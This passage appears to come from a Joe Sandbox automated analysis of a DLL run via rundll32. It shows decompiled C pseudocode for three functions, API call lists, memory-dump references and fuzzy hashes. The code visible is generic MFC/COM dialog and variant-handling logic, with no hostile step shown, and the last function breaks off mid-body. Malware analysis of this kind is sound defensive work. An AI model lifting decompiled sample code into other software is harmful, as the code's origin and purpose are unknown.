                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1151147025-0
                                                                                                            • Opcode ID: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
                                                                                                            • Instruction ID: e4bb4a9781883fca1ffd26e7a91d1cf17580d25377b1e53741b6ed809414a6cf
                                                                                                            • Opcode Fuzzy Hash: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
                                                                                                            • Instruction Fuzzy Hash: 8DF03671A40714AEF7206F718C8EF2B7BB4EB86B11F01891AE6418F1D1D6B599018F94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E09F Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E1000E09F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x10045580; // 0x6a53a566
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1001FBC4(E100338B7, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E1000424F(_t246 + 0x28, E1001044F());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E10004D4A(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1001587F(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E100054DB(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E1001B444(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E10013723(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E10013CC0( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E10014EA9( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E1000DFFE(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E1001B7A6(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E10001260( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1001FBB5(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

































                                                                                                            0x1000e0a3
                                                                                                            0x1000e0a7
                                                                                                            0x1000e0ae
                                                                                                            0x1000e0b1
                                                                                                            0x1000e0b8
                                                                                                            0x1000e0c4
                                                                                                            0x1000e0c7
                                                                                                            0x1000e0ca
                                                                                                            0x1000e0d0
                                                                                                            0x1000e0d6
                                                                                                            0x1000e0d9
                                                                                                            0x1000e0dc
                                                                                                            0x1000e0df
                                                                                                            0x1000e0e7
                                                                                                            0x1000e0ed
                                                                                                            0x1000e0f4
                                                                                                            0x1000e0fe
                                                                                                            0x1000e106
                                                                                                            0x1000e10e
                                                                                                            0x1000e111
                                                                                                            0x1000e115
                                                                                                            0x1000e119
                                                                                                            0x1000e11c
                                                                                                            0x1000e11c
                                                                                                            0x1000e11f
                                                                                                            0x1000e127
                                                                                                            0x1000e131
                                                                                                            0x1000e140
                                                                                                            0x1000e143
                                                                                                            0x1000e146
                                                                                                            0x1000e149
                                                                                                            0x1000e14f
                                                                                                            0x1000e157
                                                                                                            0x1000e159
                                                                                                            0x1000e15b
                                                                                                            0x1000e15f
                                                                                                            0x1000e164
                                                                                                            0x1000e168
                                                                                                            0x1000e16e
                                                                                                            0x1000e170
                                                                                                            0x1000e172
                                                                                                            0x1000e175
                                                                                                            0x1000e175
                                                                                                            0x1000e164
                                                                                                            0x1000e178
                                                                                                            0x1000e185
                                                                                                            0x1000e192
                                                                                                            0x1000e195
                                                                                                            0x1000e198
                                                                                                            0x1000e19b
                                                                                                            0x1000e19e
                                                                                                            0x1000e1ac
                                                                                                            0x1000e1ae
                                                                                                            0x1000e1ae
                                                                                                            0x1000e1b1
                                                                                                            0x1000e1b6
                                                                                                            0x1000e1b9
                                                                                                            0x1000e1bc
                                                                                                            0x1000e242
                                                                                                            0x1000e242
                                                                                                            0x1000e245
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c4
                                                                                                            0x1000e1c8
                                                                                                            0x1000e1cb
                                                                                                            0x1000e1cf
                                                                                                            0x1000e1d5
                                                                                                            0x1000e1d8
                                                                                                            0x1000e20f
                                                                                                            0x1000e215
                                                                                                            0x1000e218
                                                                                                            0x1000e21a
                                                                                                            0x1000e21e
                                                                                                            0x1000e230
                                                                                                            0x1000e230
                                                                                                            0x1000e220
                                                                                                            0x1000e229
                                                                                                            0x1000e229
                                                                                                            0x1000e232
                                                                                                            0x1000e236
                                                                                                            0x1000e1da
                                                                                                            0x1000e1dc
                                                                                                            0x1000e1df
                                                                                                            0x1000e1e4
                                                                                                            0x1000e1eb
                                                                                                            0x1000e1ee
                                                                                                            0x1000e1f6
                                                                                                            0x1000e1fb
                                                                                                            0x1000e1fe
                                                                                                            0x1000e201
                                                                                                            0x1000e208
                                                                                                            0x1000e208
                                                                                                            0x1000e239
                                                                                                            0x1000e23f
                                                                                                            0x00000000
                                                                                                            0x1000e24c
                                                                                                            0x1000e24c
                                                                                                            0x1000e24c
                                                                                                            0x1000e24f
                                                                                                            0x1000e256
                                                                                                            0x1000e257
                                                                                                            0x1000e258
                                                                                                            0x1000e262
                                                                                                            0x1000e25a
                                                                                                            0x1000e25a
                                                                                                            0x1000e25a
                                                                                                            0x1000e268
                                                                                                            0x1000e26a
                                                                                                            0x1000e26b
                                                                                                            0x1000e271
                                                                                                            0x1000e272
                                                                                                            0x1000e275
                                                                                                            0x1000e289
                                                                                                            0x1000e28d
                                                                                                            0x1000e290
                                                                                                            0x1000e292
                                                                                                            0x1000e294
                                                                                                            0x1000e297
                                                                                                            0x1000e2a0
                                                                                                            0x1000e2a9
                                                                                                            0x1000e2e8
                                                                                                            0x1000e2fc
                                                                                                            0x1000e308
                                                                                                            0x1000e31b
                                                                                                            0x1000e327
                                                                                                            0x1000e334
                                                                                                            0x1000e340
                                                                                                            0x1000e340
                                                                                                            0x1000e2a9
                                                                                                            0x1000e349
                                                                                                            0x1000e34e
                                                                                                            0x1000e34e
                                                                                                            0x1000e354
                                                                                                            0x1000e359
                                                                                                            0x1000e3a1
                                                                                                            0x1000e35b
                                                                                                            0x1000e363
                                                                                                            0x1000e365
                                                                                                            0x1000e365
                                                                                                            0x1000e369
                                                                                                            0x1000e36d
                                                                                                            0x1000e378
                                                                                                            0x1000e382
                                                                                                            0x1000e38a
                                                                                                            0x1000e38b
                                                                                                            0x1000e38c
                                                                                                            0x1000e39b
                                                                                                            0x1000e39b

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 1000E0B8
                                                                                                            • MapDialogRect.USER32(?,00000000), ref: 1000E149
                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 1000E168
                                                                                                            • CLSIDFromString.OLE32(?,?,00000000), ref: 1000E25A
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000), ref: 1000E262
                                                                                                            • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 1000E2FC
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000E34E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2841959276-0
                                                                                                            • Opcode ID: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
                                                                                                            • Instruction ID: a3f1bd5bd1abf24c4919bb55c1ab413f5f44746dc04b4daccf7064a6dc2a22e9
                                                                                                            • Opcode Fuzzy Hash: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
                                                                                                            • Instruction Fuzzy Hash: EFB1F3B5900259AFEB04DFA8C984AED7BF4FF08344F05812AFC19A7251E774E994CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001A49E Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 42%
                                                                                                            			E1001A49E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E1001FBC4(E100346AE, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E1001FC9C(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E1000911A(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E10020F40(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E1001BDF4(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E10019F87(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E1001BDD4(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x1003b21c);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x1003b19c, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}














                                                                                                            0x1001a49e
                                                                                                            0x1001a49e
                                                                                                            0x1001a4a5
                                                                                                            0x1001a4aa
                                                                                                            0x1001a4b1
                                                                                                            0x1001a4b8
                                                                                                            0x1001a4bb
                                                                                                            0x1001a4be
                                                                                                            0x1001a624
                                                                                                            0x1001a624
                                                                                                            0x1001a62f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a4c4
                                                                                                            0x1001a4c4
                                                                                                            0x1001a4ca
                                                                                                            0x1001a4cd
                                                                                                            0x1001a4d3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a4d9
                                                                                                            0x1001a4de
                                                                                                            0x1001a4e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a4ed
                                                                                                            0x1001a4f0
                                                                                                            0x1001a500
                                                                                                            0x1001a50a
                                                                                                            0x1001a511
                                                                                                            0x1001a516
                                                                                                            0x1001a51d
                                                                                                            0x1001a522
                                                                                                            0x1001a526
                                                                                                            0x1001a52a
                                                                                                            0x1001a55f
                                                                                                            0x1001a55f
                                                                                                            0x1001a52c
                                                                                                            0x1001a537
                                                                                                            0x1001a540
                                                                                                            0x1001a544
                                                                                                            0x1001a54d
                                                                                                            0x1001a551
                                                                                                            0x1001a557
                                                                                                            0x1001a557
                                                                                                            0x1001a562
                                                                                                            0x1001a568
                                                                                                            0x1001a56e
                                                                                                            0x1001a571
                                                                                                            0x1001a574
                                                                                                            0x1001a57a
                                                                                                            0x1001a57f
                                                                                                            0x1001a583
                                                                                                            0x1001a586
                                                                                                            0x1001a587
                                                                                                            0x1001a58c
                                                                                                            0x1001a591
                                                                                                            0x1001a593
                                                                                                            0x1001a5a2
                                                                                                            0x1001a5b6
                                                                                                            0x1001a5b9
                                                                                                            0x1001a5bf
                                                                                                            0x1001a5c2
                                                                                                            0x1001a5cd
                                                                                                            0x1001a5d2
                                                                                                            0x1001a5d2
                                                                                                            0x1001a5dc
                                                                                                            0x1001a5e1
                                                                                                            0x1001a5e1
                                                                                                            0x1001a5eb
                                                                                                            0x1001a5f0
                                                                                                            0x1001a5f0
                                                                                                            0x1001a5f6
                                                                                                            0x1001a5f9
                                                                                                            0x1001a5f9
                                                                                                            0x1001a591
                                                                                                            0x1001a5fd
                                                                                                            0x1001a605
                                                                                                            0x1001a60b
                                                                                                            0x1001a615
                                                                                                            0x1001a615
                                                                                                            0x1001a61b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 1001A4A5
                                                                                                            • _memset.LIBCMT ref: 1001A511
                                                                                                              • Part of subcall function 1001BDF4: _memset.LIBCMT ref: 1001BDFC
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A551
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1001A5D2
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1001A5E1
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1001A5F0
                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 1001A605
                                                                                                              • Part of subcall function 10019F87: __EH_prolog3.LIBCMT ref: 10019FA3
                                                                                                              • Part of subcall function 10019F87: VariantClear.OLEAUT32(?), ref: 1001A008
                                                                                                              • Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2905758408-0
                                                                                                            • Opcode ID: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
                                                                                                            • Instruction ID: ceb74f55e44ee9bcef50cea17c44e0e4c1adfe79803e4b69d5972ce8ea6398f3
                                                                                                            • Opcode Fuzzy Hash: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
                                                                                                            • Instruction Fuzzy Hash: 3551F271A006099FDB51CFA4C884BEEBBF9FF49305F104529E116EB292DB74E984CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10017235 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10017235(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1001FBC4(E1003426F, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E1000EC55(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E1000E519();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E1001FC9C(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x1003b21c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E10020F40(_t97, _t101 - 0x48, 0, 0x20);
						E10020F40(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x1003b19c, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
